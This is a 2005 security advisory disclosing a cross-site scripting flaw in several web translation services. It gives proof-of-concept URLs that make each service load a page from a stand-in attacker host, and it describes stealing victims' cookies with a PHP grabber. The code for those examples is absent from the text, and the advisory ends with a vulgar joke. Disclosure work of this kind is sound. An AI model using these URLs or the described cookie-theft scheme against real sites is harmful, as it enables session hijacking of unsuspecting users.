Title: Multiple Translation websites Cross Site Scripting vulnerability

Author: Simo Ben youssef aka _6mO_HaCk
Date: 22 December 2005
MorX Security Research Team
http://www.morx.org

Service: Translation tools/websites

Vendors: Google, altavista, IBM, freetranslation, worldlingo, paralink and almost any site using the webpage translation technique

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Tested on: Microsoft IE 6.0 and firefox 5.1 (should work on all browsers)

Details:

The following is a Cross Site Scripting vulnerability that I have found so far in all the translation websites that I have seen. These websites use the URL webpage translation method, which consists of passing a URL of the user's choice to the web application for translation. After the webpage has been processed (translated), the application doesn't filter the webpage content before outputting it to the user's browser.

Impact:

A remote attacker can construct malicious code in a webpage, upload it to his/her webserver and make a user of a vulnerable website visit the page through the translation script, so that the malicious code is executed by the client browser.
Malicious code, as an example, can be JavaScript code to steal the victim's cookie.

Example of a malicious webpage:

This JavaScript code will redirect the victim to the attacker's PHP script, which grabs the cookie information and then logs it and/or sends it back to the attacker's email.

Example of a PHP grabber:

For testing purposes you may use the following JavaScript:

Proof Of Concept Exploits:

The following list is just a very small list of many vulnerable websites.

paralink:
http://webtranslation.paralink.com/webtranslation.asp?clientid=default&appid=default&b=1&dir=en/fr&dic=general&extsvr=&auto=1&url=http://www.attacker-site/malicious-code.html

Google:
http://translate.google.com/translate?u=http://www.attacker-site/malicious-code.html

Freetranslation:
http://fets3.freetranslation.com/?Url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&Language=English%2FSpanish&Sequence=core

Altavista:
http://babelfish.altavista.com/babelfish/urltrurl?tt=url&url=http://www.attacker-site/malicious-code.html&lp=zh_en

IBM:
http://www.alphaworks.ibm.com/aw.nsf/html/mt
http://192.195.29.104/demand?mtlang=enfr&translate=http%253A%252F%252Fwww.attacker-site%252Fmalicious-code.html

Worldlingo:
http://www.worldlingo.com/wl/services/S221S1U3QrQ4rVX1J4x4O5WifQlI6nxpL/translation?wl_trglang=DE&wl_rurl=http%3A%2F%2Fwww.attacker-site.com&wl_url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html

Comprendium:
http://www.comprendium.es/index_demo_text_ca.html

online-translator:
http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&direction=er&template=General&cp1=NO&cp2=NO&autotranslate=on&transliterate=on&psubmit2.x=44&psubmit2.y=12

systranbox:
http://www.systranbox.com/systran/box ...
and more

Screen captures demonstrating the vulnerabilities:

www.morx.org/altavista.JPG
www.morx.org/altavista2.JPG
www.morx.org/google.JPG
www.morx.org/worldlingo.JPG
www.morx.org/worldlingo2.JPG
www.morx.org/freetranslation.JPG
www.morx.org/freetranslation2.JPG
www.morx.org/paralink.JPG
www.morx.org/paralink2.JPG
www.morx.org/online-translator.JPG
www.morx.org/ibm.JPG
www.morx.org/comprendium.JPG
www.morx.org/systran.JPG

Disclaimer:

This entire document is for educational purposes and testing only. Modification, use and/or publishing of this information is entirely at your OWN risk; I cannot be held responsible for any of the above.

Most of the vendors were already contacted and informed about these problems; some confirmed, some didn't answer back and some weren't contacted because I couldn't find their contact information.

My x-mas wish:

Dear Father Christmas, when you come down from the sky with your presents by the thousand, don't forget to shove a d*** up Abder's a** (I love you anyway) :D

Greets:

Special Greets and Thanks to HandriX and all MorX members, Securma Massine and Anasoft. Greets to my brother in fuxoring Abder :>